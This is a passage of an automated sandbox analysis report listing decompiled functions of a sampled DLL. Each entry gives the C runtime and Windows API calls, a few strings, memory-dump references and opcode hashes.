                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 1615890066-4289949731
                                                                                          • Opcode ID: 8b4a6ccaf35318c7727e937a0c6d14684d107e286632a2be97791bcaf32471ca
                                                                                          • Instruction ID: 42d839308a534819f9bf98556e381d490f917c7cf452c925a98f97122ea4a7ee
                                                                                          • Opcode Fuzzy Hash: 8b4a6ccaf35318c7727e937a0c6d14684d107e286632a2be97791bcaf32471ca
                                                                                          • Instruction Fuzzy Hash: 8F31E832304610BBF7209E5CE880B5EF7EDEBA9664F21492FE151DB281D772DC4087A5
                                                                                          Function 6D06C23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBCMT ref: 6D06C24E
                                                                                            • Part of subcall function 6D06C1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6D06C1DF
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6D06C265
                                                                                          • ___FrameUnwindToState.LIBCMT ref: 6D06C273
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 2163707966-3733052814
                                                                                          • Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                                                          • Instruction ID: 5acc5fc83d681d310dd3864bae825ec56bf0369090190b9f25f6de6adf286279
                                                                                          • Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                                                          • Instruction Fuzzy Hash: 7B01E47140518ABFEF125F91CC45FAA7F6AFF08354F158010BE1816120D73699A2DBB9
                                                                                          Function 6D042300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          • Opcode ID: 0f88503f5cb31e56527d0ed4831c5b6d8bce2c94210bd382907567a80d034669
                                                                                          • Instruction ID: b256a01833fd54b3a391945c4ad1db854cbfd353d3d64f5b2165506b9dd93a67
                                                                                          • Opcode Fuzzy Hash: 0f88503f5cb31e56527d0ed4831c5b6d8bce2c94210bd382907567a80d034669
                                                                                          • Instruction Fuzzy Hash: 73917B713087029FE724DF68D890F2AB7E9FBC9614F108A2DE495C7340E734E9058BA2
                                                                                          Function 6D023C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,4E8A916F), ref: 6D023C49
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D023C81
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023D26
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023D30
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023D89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayElementInitSafe
                                                                                          • String ID:
                                                                                          • API String ID: 4110538090-0
                                                                                          • Opcode ID: 8f39d0c074076b9351719ff0308045fbf7b3a5123859a695a34289f9dd1054d9
                                                                                          • Instruction ID: 198d4cad990a09727a50708cf66e0228b81476d2dd350e6c3df929349e729fa2
                                                                                          • Opcode Fuzzy Hash: 8f39d0c074076b9351719ff0308045fbf7b3a5123859a695a34289f9dd1054d9
                                                                                          • Instruction Fuzzy Hash: E4617E72A05249DFDB00DFA8C880AAEB7B9FF4D310F2585ADE615AB350D731AD45CB90
                                                                                          Function 6D031D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Timetime$Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 4176159691-0
                                                                                          • Opcode ID: 0c51ad29f265baae82d43825efc233799e5c26280ca5371d495f26789fdd1340
                                                                                          • Instruction ID: 1095d38de79de3575873195553c39232ed8df8dec7372cae18a31740fc3f1d10
                                                                                          • Opcode Fuzzy Hash: 0c51ad29f265baae82d43825efc233799e5c26280ca5371d495f26789fdd1340
                                                                                          • Instruction Fuzzy Hash: F851C0B5D082569FFB01CFE8D8857AD7BF8BB0A340F16446ED508DB241D77199408BA7
                                                                                          Function 6D016D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • _rand.LIBCMT ref: 6D016DEA
                                                                                            • Part of subcall function 6D069E0C: __getptd.LIBCMT ref: 6D069E0C
                                                                                          • std::exception::exception.LIBCMT ref: 6D016E17
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D016E2C
                                                                                          • std::exception::exception.LIBCMT ref: 6D016E3B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D016E50
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                                                                          • String ID:
                                                                                          • API String ID: 2791304714-0
                                                                                          • Opcode ID: 9e956316e5f86e6bfca73d564ed021de2b97cc488ea13cd2a8a2559d914a9ae7
                                                                                          • Instruction ID: f32870378d6ed5fa0560691369d81949472f2aee1c7023fda44e27e793f2276c
                                                                                          • Opcode Fuzzy Hash: 9e956316e5f86e6bfca73d564ed021de2b97cc488ea13cd2a8a2559d914a9ae7
                                                                                          • Instruction Fuzzy Hash: 993124B19047449FDB50CFA8D880B9AFBF4FB08314F44896ED85A97B42E775E604CBA1
                                                                                          Function 6D017750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6D017761
                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?), ref: 6D017782
                                                                                          • EnterCriticalSection.KERNEL32(00000018), ref: 6D017796
                                                                                          • LeaveCriticalSection.KERNEL32(00000018), ref: 6D0177CE
                                                                                          • QueueUserWorkItem.KERNEL32(6D031D50,00000000,00000010), ref: 6D01780C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                                                                          • String ID:
                                                                                          • API String ID: 584243675-0
                                                                                          • Opcode ID: c11a60418627603e1fdb1d8dcb90d2ceb926c666799987852f83c0286e703cbf
                                                                                          • Instruction ID: 34dfcd38b01547b04464f5689b63f8f2e7382bc1abd5dce418890623d38660b8
                                                                                          • Opcode Fuzzy Hash: c11a60418627603e1fdb1d8dcb90d2ceb926c666799987852f83c0286e703cbf
                                                                                          • Instruction Fuzzy Hash: 5521BF31948209EFEB00CFA4D844BAFBBF9FB86301F018559E55687640D770E648CBA1
                                                                                          Function 6D005AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 6D005ACB
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005ABC
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005AE0
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D005B18
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005B2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                          • String ID:
                                                                                          • API String ID: 921928366-0
                                                                                          • Opcode ID: 26e2583f84d2ba944bbd308e2a4849658c26ec126957a0d29e2fbc576dcb24d5
                                                                                          • Instruction ID: bd73d3db22e49393b13aefc36613001145af7f369fe5c723c19359801459023a
                                                                                          • Opcode Fuzzy Hash: 26e2583f84d2ba944bbd308e2a4849658c26ec126957a0d29e2fbc576dcb24d5
                                                                                          • Instruction Fuzzy Hash: A60121B58142087FFB04DFE4E844EEE77B8AF14340F418159E909A7541FB34D6048BB5
                                                                                          Function 6D06F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 6D06F047
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __amsg_exit.LIBCMT ref: 6D06F067
                                                                                          • __lock.LIBCMT ref: 6D06F077
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6D06F094
                                                                                          • InterlockedIncrement.KERNEL32(05D01658), ref: 6D06F0BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                          • String ID:
                                                                                          • API String ID: 4271482742-0
                                                                                          • Opcode ID: be859ae459cd787b4cedfd702b47471c58a6b2267544102416001946ab48fb9d
                                                                                          • Instruction ID: 017fda0e57a1458e9cb6346cf6448331b5af2c0f8cc9105258ea0e78e937af2b
                                                                                          • Opcode Fuzzy Hash: be859ae459cd787b4cedfd702b47471c58a6b2267544102416001946ab48fb9d
                                                                                          • Instruction Fuzzy Hash: 1501F535D05BA2ABFF119FA8C40076E7BB8BF06714F160005E920A7281CB34A941CFF2
                                                                                          Function 6D06F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 6D06F7C8
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __getptd.LIBCMT ref: 6D06F7DF
                                                                                          • __amsg_exit.LIBCMT ref: 6D06F7ED
                                                                                          • __lock.LIBCMT ref: 6D06F7FD
                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 6D06F811
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                          • String ID:
                                                                                          • API String ID: 938513278-0
                                                                                          • Opcode ID: 40baef4d89e96e889fe5ff5856f37747d77e907a01567e03ce9990fcab51480e
                                                                                          • Instruction ID: 12c965f3500901e16345dbc484021ce6c3e707cb5fc827363e66f5dd04e8fca8
                                                                                          • Opcode Fuzzy Hash: 40baef4d89e96e889fe5ff5856f37747d77e907a01567e03ce9990fcab51480e
                                                                                          • Instruction Fuzzy Hash: D9F0E932D4D7919FF731AB789801B5D3BE4BF4072CF224149E610AB2C1DF64A540DAB6
                                                                                          Function 6D04E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 2001391462-3916222277
                                                                                          • Opcode ID: a0b6aa869c7724c6a8a007c04773d2c8c407495aa855c44e3e712bcc88cd3c88
                                                                                          • Instruction ID: 4601283fa214291fbf8138787b4c9c4813603f54315056ab8855d9a5194213c2
                                                                                          • Opcode Fuzzy Hash: a0b6aa869c7724c6a8a007c04773d2c8c407495aa855c44e3e712bcc88cd3c88
                                                                                          • Instruction Fuzzy Hash: 7AC147756083028FE754CF28C890A6AB7E6FF89314F048A3DE595C7250E771EA49CB42
                                                                                          Function 6D068B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcpy_s_memmove_memset
                                                                                          • String ID: EncodingParameters
                                                                                          • API String ID: 4034675494-55378216
                                                                                          • Opcode ID: 4b57199c6f6c816e00f6faf075a23363c41bb14e27954abbddcd5b381edee792
                                                                                          • Instruction ID: bbc1cecb487474a7614382a5d5763b4b5295db3c6c3eeb7c7e0be75839de07ed
                                                                                          • Opcode Fuzzy Hash: 4b57199c6f6c816e00f6faf075a23363c41bb14e27954abbddcd5b381edee792
                                                                                          • Instruction Fuzzy Hash: 06916A746083819FE700CF28C880B6BBBE5AFDA714F144A5DF99887391D671E945CBA2
                                                                                          Function 6D041200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D05D820: _memmove.LIBCMT ref: 6D05D930
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0413D4
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038D8A
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038DAF
                                                                                          Strings
                                                                                          • for this key, xrefs: 6D041348
                                                                                          • doesn't match the required length of , xrefs: 6D041316
                                                                                          • : ciphertext length of , xrefs: 6D0412E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
